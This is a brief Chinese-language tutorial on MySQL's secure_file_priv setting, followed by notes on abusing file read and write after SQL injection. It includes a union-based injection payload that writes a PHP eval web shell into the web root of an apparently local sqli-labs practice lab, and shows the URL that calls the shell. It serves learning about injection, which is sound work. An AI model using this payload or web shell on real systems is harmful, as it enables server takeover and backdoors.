Mysql 中的secure_file_priv参数设置_secure-file-priv

secure_file_priv是MySQL中的系统变量，用于限制文件的读取和写入。

该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。

修改完参数之后，必须重启数据库才能生效。

启动MySQL，先查看secure_file_priv的值。

命令：show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ，限制文件的读取和写入。

2.secure_file_priv = 文件路径 ，限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路径；

内容在文件中是以一行的形式呈现，多行数据会出现数据保存不全；

dumpfile只能写一行，并且输出中不存在任何格式。

2.select  *** into outfile  文件路径；

内容有特殊格式转换，该换行换行，较比dumpfile更加好用；

outfile可以写入多行数据，并且字段和行终止符都可以作为格式输出。

例如：?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

调用：url/test.php?123=phpinfo();

3.select  *** load_file （下载文件）

select  load_file(文件路径);